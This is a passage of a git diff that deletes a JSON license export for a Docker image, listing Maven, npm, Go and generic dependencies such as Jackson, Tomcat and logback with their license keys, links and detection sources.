diff --git a/Docker_07f669c_License_Export.json b/Docker_07f669c_License_Export.json deleted file mode 100755 index fdf37f0eb..000000000 --- a/Docker_07f669c_License_Export.json +++ /dev/null @@ -1,6065 +0,0 @@ -[ - { - "component_id": "bootstrap:5.2.3", - "component_name": "bootstrap", - "version": "5.2.3", - "pkg_type": "npm", - "package_id": "npm://bootstrap", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 2 - } - ] - } - ] - }, - { - "component_id": "caffeine-3.1.8.jar", - "component_name": "caffeine-3.1.8.jar", - "version": "", - "pkg_type": "generic", - "package_id": "generic://sha256:7dd15f9df1be238ffaa367ce6f556737a88031de4294dad18eef57c474ddf1d3/caffeine-3.1.8.jar", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ch.qos.logback:logback-classic:1.4.11", - "component_name": "ch.qos.logback:logback-classic", - "version": "1.4.11", - "pkg_type": "maven", - "package_id": "gav://ch.qos.logback:logback-classic", - "licenses": [ - { - "key": "EPL-1.0", - "link": "http://www.eclipse.org/legal/epl-v10.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.1", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "ch.qos.logback:logback-core:1.4.11", - "component_name": "ch.qos.logback:logback-core", - "version": "1.4.11", - "pkg_type": "maven", - "package_id": "gav://ch.qos.logback:logback-core", - "licenses": [ - { - "key": "EPL-1.0", - "link": "http://www.eclipse.org/legal/epl-v10.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.1", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "checker-qual-3.31.0.jar", - "component_name": "checker-qual-3.31.0.jar", - "version": "", - "pkg_type": "generic", - "package_id": "generic://sha256:1cef5f476d22c6fb45387ddd8404f5e821cbd66487be1bdf8ee64871e63451b9/checker-qual-3.31.0.jar", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "com.fasterxml.jackson.core:jackson-annotations:2.15.2", - "component_name": "com.fasterxml.jackson.core:jackson-annotations", - "version": "2.15.2", - "pkg_type": "maven", - "package_id": "gav://com.fasterxml.jackson.core:jackson-annotations", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "com.fasterxml.jackson.core:jackson-core:2.15.2", - "component_name": "com.fasterxml.jackson.core:jackson-core", - "version": "2.15.2", - "pkg_type": "maven", - "package_id": "gav://com.fasterxml.jackson.core:jackson-core", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "com.fasterxml.jackson.core:jackson-databind:2.15.2", - "component_name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.15.2", - "pkg_type": "maven", - "package_id": "gav://com.fasterxml.jackson.core:jackson-databind", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "com.fasterxml.jackson.datatype:jackson-datatype-jdk8:2.15.2", - "component_name": "com.fasterxml.jackson.datatype:jackson-datatype-jdk8", - "version": "2.15.2", - "pkg_type": "maven", - "package_id": "gav://com.fasterxml.jackson.datatype:jackson-datatype-jdk8", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "com.fasterxml.jackson.datatype:jackson-datatype-jsr310:2.15.2", - "component_name": "com.fasterxml.jackson.datatype:jackson-datatype-jsr310", - "version": "2.15.2", - "pkg_type": "maven", - "package_id": "gav://com.fasterxml.jackson.datatype:jackson-datatype-jsr310", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "com.fasterxml.jackson.module:jackson-module-parameter-names:2.15.2", - "component_name": "com.fasterxml.jackson.module:jackson-module-parameter-names", - "version": "2.15.2", - "pkg_type": "maven", - "package_id": "gav://com.fasterxml.jackson.module:jackson-module-parameter-names", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "com.fasterxml:classmate:1.5.1", - "component_name": "com.fasterxml:classmate", - "version": "1.5.1", - "pkg_type": "maven", - "package_id": "gav://com.fasterxml:classmate", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "com.google.errorprone:error_prone_annotations:2.21.1", - "component_name": "com.google.errorprone:error_prone_annotations", - "version": "2.21.1", - "pkg_type": "maven", - "package_id": "gav://com.google.errorprone:error_prone_annotations", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "com.h2database:h2:2.1.214", - "component_name": "com.h2database:h2", - "version": "2.1.214", - "pkg_type": "maven", - "package_id": "gav://com.h2database:h2", - "licenses": [ - { - "key": "EPL-1.0", - "link": "http://www.eclipse.org/legal/epl-v10.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "MPL-2.0", - "link": "http://opensource.org/licenses/MPL-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "com.sun.istack:istack-commons-runtime:4.1.2", - "component_name": "com.sun.istack:istack-commons-runtime", - "version": "4.1.2", - "pkg_type": "maven", - "package_id": "gav://com.sun.istack:istack-commons-runtime", - "licenses": [ - { - "key": "EPL-1.0", - "link": "http://www.eclipse.org/legal/epl-v10.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "com.zaxxer:HikariCP:5.0.1", - "component_name": "com.zaxxer:HikariCP", - "version": "5.0.1", - "pkg_type": "maven", - "package_id": "gav://com.zaxxer:HikariCP", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "font-awesome:4.7.0", - "component_name": "font-awesome", - "version": "4.7.0", - "pkg_type": "npm", - "package_id": "npm://font-awesome", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "OFL-1.1", - "link": "http://scripts.sil.org/cms/scripts/page.php?item_id=OFL_web", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/BurntSushi/toml:1.3.2", - "component_name": "github.com/BurntSushi/toml", - "version": "1.3.2", - "pkg_type": "go", - "package_id": "go://github.com/BurntSushi/toml", - "licenses": [ - { - "key": "Unknown", - "link": "", - "sources": [] - } - ] - }, - { - "component_id": "github.com/BurntSushi/toml:1.1.0", - "component_name": "github.com/BurntSushi/toml", - "version": "1.1.0", - "pkg_type": "go", - "package_id": "go://github.com/BurntSushi/toml", - "licenses": [ - { - "key": "Unknown", - "link": "", - "sources": [] - } - ] - }, - { - "component_id": "github.com/Masterminds/semver/v3:3.2.1", - "component_name": "github.com/Masterminds/semver/v3", - "version": "3.2.1", - "pkg_type": "go", - "package_id": "go://github.com/Masterminds/semver/v3", - "licenses": [ - { - "key": "Unknown", - "link": "", - "sources": [] - } - ] - }, - { - "component_id": "github.com/apex/log:1.9.0", - "component_name": "github.com/apex/log", - "version": "1.9.0", - "pkg_type": "go", - "package_id": "go://github.com/apex/log", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/buildpacks/libcnb:1.28.0", - "component_name": "github.com/buildpacks/libcnb", - "version": "1.28.0", - "pkg_type": "go", - "package_id": "go://github.com/buildpacks/libcnb", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/creack/pty:1.1.18", - "component_name": "github.com/creack/pty", - "version": "1.1.18", - "pkg_type": "go", - "package_id": "go://github.com/creack/pty", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/golang/go:1.19.11", - "component_name": "github.com/golang/go", - "version": "1.19.11", - "pkg_type": "go", - "package_id": "go://github.com/golang/go", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/golang/go:1.20.5", - "component_name": "github.com/golang/go", - "version": "1.20.5", - "pkg_type": "go", - "package_id": "go://github.com/golang/go", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/google/go-cmp:0.5.9", - "component_name": "github.com/google/go-cmp", - "version": "0.5.9", - "pkg_type": "go", - "package_id": "go://github.com/google/go-cmp", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/h2non/filetype:1.1.3", - "component_name": "github.com/h2non/filetype", - "version": "1.1.3", - "pkg_type": "go", - "package_id": "go://github.com/h2non/filetype", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/heroku/color:0.0.6", - "component_name": "github.com/heroku/color", - "version": "0.0.6", - "pkg_type": "go", - "package_id": "go://github.com/heroku/color", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/imdario/mergo:0.3.16", - "component_name": "github.com/imdario/mergo", - "version": "0.3.16", - "pkg_type": "go", - "package_id": "go://github.com/imdario/mergo", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/magiconair/properties:1.8.7", - "component_name": "github.com/magiconair/properties", - "version": "1.8.7", - "pkg_type": "go", - "package_id": "go://github.com/magiconair/properties", - "licenses": [ - { - "key": "BSD-2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "Mup", - "link": "https://fedoraproject.org/wiki/Licensing/Mup", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/mattn/go-colorable:0.1.13", - "component_name": "github.com/mattn/go-colorable", - "version": "0.1.13", - "pkg_type": "go", - "package_id": "go://github.com/mattn/go-colorable", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/mattn/go-isatty:0.0.19", - "component_name": "github.com/mattn/go-isatty", - "version": "0.0.19", - "pkg_type": "go", - "package_id": "go://github.com/mattn/go-isatty", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/mattn/go-isatty:0.0.17", - "component_name": "github.com/mattn/go-isatty", - "version": "0.0.17", - "pkg_type": "go", - "package_id": "go://github.com/mattn/go-isatty", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/mattn/go-shellwords:1.0.12", - "component_name": "github.com/mattn/go-shellwords", - "version": "1.0.12", - "pkg_type": "go", - "package_id": "go://github.com/mattn/go-shellwords", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/miekg/dns:1.1.55", - "component_name": "github.com/miekg/dns", - "version": "1.1.55", - "pkg_type": "go", - "package_id": "go://github.com/miekg/dns", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/mitchellh/hashstructure/v2:2.0.2", - "component_name": "github.com/mitchellh/hashstructure/v2", - "version": "2.0.2", - "pkg_type": "go", - "package_id": "go://github.com/mitchellh/hashstructure/v2", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/onsi/gomega:1.27.8", - "component_name": "github.com/onsi/gomega", - "version": "1.27.8", - "pkg_type": "go", - "package_id": "go://github.com/onsi/gomega", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/paketo-buildpacks/libpak:1.66.1", - "component_name": "github.com/paketo-buildpacks/libpak", - "version": "1.66.1", - "pkg_type": "go", - "package_id": "go://github.com/paketo-buildpacks/libpak", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/pavlo-v-chernykh/keystore-go/v4:4.4.1", - "component_name": "github.com/pavlo-v-chernykh/keystore-go/v4", - "version": "4.4.1", - "pkg_type": "go", - "package_id": "go://github.com/pavlo-v-chernykh/keystore-go/v4", - "licenses": [ - { - "key": "MIT", - "link": "http://www.opensource.org/licenses/MIT", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/pkg/errors:0.9.1", - "component_name": "github.com/pkg/errors", - "version": "0.9.1", - "pkg_type": "go", - "package_id": "go://github.com/pkg/errors", - "licenses": [ - { - "key": "BSD-2-Clause", - "link": "http://opensource.org/licenses/BSD-2-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "github.com/xi2/xz:0.0.0-20171230120015-48954b6210f8", - "component_name": "github.com/xi2/xz", - "version": "0.0.0-20171230120015-48954b6210f8", - "pkg_type": "go", - "package_id": "go://github.com/xi2/xz", - "licenses": [ - { - "key": "Unknown", - "link": "", - "sources": [] - } - ] - }, - { - "component_id": "golang.org/x/net:0.11.0", - "component_name": "golang.org/x/net", - "version": "0.11.0", - "pkg_type": "go", - "package_id": "go://golang.org/x/net", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "golang.org/x/sys:0.9.0", - "component_name": "golang.org/x/sys", - "version": "0.9.0", - "pkg_type": "go", - "package_id": "go://golang.org/x/sys", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "golang.org/x/sys:0.7.0", - "component_name": "golang.org/x/sys", - "version": "0.7.0", - "pkg_type": "go", - "package_id": "go://golang.org/x/sys", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "io.micrometer:micrometer-commons:1.11.3", - "component_name": "io.micrometer:micrometer-commons", - "version": "1.11.3", - "pkg_type": "maven", - "package_id": "gav://io.micrometer:micrometer-commons", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "io.micrometer:micrometer-core:1.11.3", - "component_name": "io.micrometer:micrometer-core", - "version": "1.11.3", - "pkg_type": "maven", - "package_id": "gav://io.micrometer:micrometer-core", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "io.micrometer:micrometer-observation:1.11.3", - "component_name": "io.micrometer:micrometer-observation", - "version": "1.11.3", - "pkg_type": "maven", - "package_id": "gav://io.micrometer:micrometer-observation", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "io.smallrye:jandex:3.0.5", - "component_name": "io.smallrye:jandex", - "version": "3.0.5", - "pkg_type": "maven", - "package_id": "gav://io.smallrye:jandex", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "jakarta.activation:jakarta.activation-api:2.1.2", - "component_name": "jakarta.activation:jakarta.activation-api", - "version": "2.1.2", - "pkg_type": "maven", - "package_id": "gav://jakarta.activation:jakarta.activation-api", - "licenses": [ - { - "key": "BSD", - "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - }, - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "EDL 1.0", - "link": "", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "jakarta.annotation:jakarta.annotation-api:2.1.1", - "component_name": "jakarta.annotation:jakarta.annotation-api", - "version": "2.1.1", - "pkg_type": "maven", - "package_id": "gav://jakarta.annotation:jakarta.annotation-api", - "licenses": [ - { - "key": "EPL-2.0", - "link": "https://spdx.org/licenses/EPL-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0+CE", - "link": "http://www.gnu.org/software/classpath/license.html", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "jakarta.inject:jakarta.inject-api:2.0.1", - "component_name": "jakarta.inject:jakarta.inject-api", - "version": "2.0.1", - "pkg_type": "maven", - "package_id": "gav://jakarta.inject:jakarta.inject-api", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "jakarta.persistence:jakarta.persistence-api:3.1.0", - "component_name": "jakarta.persistence:jakarta.persistence-api", - "version": "3.1.0", - "pkg_type": "maven", - "package_id": "gav://jakarta.persistence:jakarta.persistence-api", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "EPL-1.0", - "link": "http://www.eclipse.org/legal/epl-v10.html", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "EPL-2.0", - "link": "https://spdx.org/licenses/EPL-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "jakarta.transaction:jakarta.transaction-api:2.0.1", - "component_name": "jakarta.transaction:jakarta.transaction-api", - "version": "2.0.1", - "pkg_type": "maven", - "package_id": "gav://jakarta.transaction:jakarta.transaction-api", - "licenses": [ - { - "key": "EPL-2.0", - "link": "https://spdx.org/licenses/EPL-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0+CE", - "link": "http://www.gnu.org/software/classpath/license.html", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "jakarta.validation:jakarta.validation-api:3.0.2", - "component_name": "jakarta.validation:jakarta.validation-api", - "version": "3.0.2", - "pkg_type": "maven", - "package_id": "gav://jakarta.validation:jakarta.validation-api", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "jakarta.xml.bind:jakarta.xml.bind-api:4.0.0", - "component_name": "jakarta.xml.bind:jakarta.xml.bind-api", - "version": "4.0.0", - "pkg_type": "maven", - "package_id": "gav://jakarta.xml.bind:jakarta.xml.bind-api", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "javax.cache:cache-api:1.1.1", - "component_name": "javax.cache:cache-api", - "version": "1.1.1", - "pkg_type": "maven", - "package_id": "gav://javax.cache:cache-api", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "jrt-fs.jar", - "component_name": "jrt-fs.jar", - "version": "", - "pkg_type": "generic", - "package_id": "generic://sha256:6e7dcc31554bd67f457cbab59f6cac9f6daa8cb45a741a63699396c03a2a7dab/jrt-fs.jar", - "licenses": [ - { - "key": "Unknown", - "link": "", - "sources": [] - } - ] - }, - { - "component_id": "mysql-connector-j-8.0.33.jar", - "component_name": "mysql-connector-j-8.0.33.jar", - "version": "", - "pkg_type": "generic", - "package_id": "generic://sha256:e2a3b2fc726a1ac64e998585db86b30fa8bf3f706195b78bb77c5f99bf877bd9/mysql-connector-j-8.0.33.jar", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "EPL-1.0", - "link": "http://www.eclipse.org/legal/epl-v10.html", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "GPL-2.0-with-GCC-exception", - "link": "https://gcc.gnu.org/git/?p=gcc.git;a=blob;f=gcc/libgcc1.c;h=762f5143fc6eed57b6797c82710f3538aa52b40b;hb=cb143a3ce4fb417c68f5fa2691a1b1b1053dfba9#l10", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.0", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "LGPL-2.1", - "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "net.bytebuddy:byte-buddy:1.14.6", - "component_name": "net.bytebuddy:byte-buddy", - "version": "1.14.6", - "pkg_type": "maven", - "package_id": "gav://net.bytebuddy:byte-buddy", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.antlr:antlr4-runtime:4.10.1", - "component_name": "org.antlr:antlr4-runtime", - "version": "4.10.1", - "pkg_type": "maven", - "package_id": "gav://org.antlr:antlr4-runtime", - "licenses": [ - { - "key": "BSD-3-Clause", - "link": "http://opensource.org/licenses/BSD-3-Clause", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.apache.logging.log4j:log4j-api:2.20.0", - "component_name": "org.apache.logging.log4j:log4j-api", - "version": "2.20.0", - "pkg_type": "maven", - "package_id": "gav://org.apache.logging.log4j:log4j-api", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.apache.logging.log4j:log4j-to-slf4j:2.20.0", - "component_name": "org.apache.logging.log4j:log4j-to-slf4j", - "version": "2.20.0", - "pkg_type": "maven", - "package_id": "gav://org.apache.logging.log4j:log4j-to-slf4j", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.apache.tomcat.embed:tomcat-embed-core:10.1.12", - "component_name": "org.apache.tomcat.embed:tomcat-embed-core", - "version": "10.1.12", - "pkg_type": "maven", - "package_id": "gav://org.apache.tomcat.embed:tomcat-embed-core", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "CDDL-1.0", - "link": "http://www.opensource.org/licenses/cddl1", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "CDDL-1.1", - "link": "http://glassfish.java.net/public/CDDL+GPL_1_1.html", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - }, - { - "key": "EPL-2.0", - "link": "https://spdx.org/licenses/EPL-2.0", - "sources": [ - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.apache.tomcat.embed:tomcat-embed-el:10.1.12", - "component_name": "org.apache.tomcat.embed:tomcat-embed-el", - "version": "10.1.12", - "pkg_type": "maven", - "package_id": "gav://org.apache.tomcat.embed:tomcat-embed-el", - "licenses": [ - { - "key": "Apache-2.0", - "link": "http://licenses.nuget.org/Apache-2.0", - "sources": [ - { - "source": "JFrog", - "occurrences": 1 - }, - { - "source": "Local File", - "occurrences": 1 - } - ] - } - ] - }, - { - "component_id": "org.apache.tomcat.embed:tomcat-embed-websocket:10.1.12", - "component_name": "org.apache.tomcat.embed:tomcat-embed-websocket", - "version": "10.1.12", - "pkg_type": "maven", - "package_id": "gav://org.apache.tomcat.embed:tomcat-embed-websocket", - "licenses": [ - { - "key": 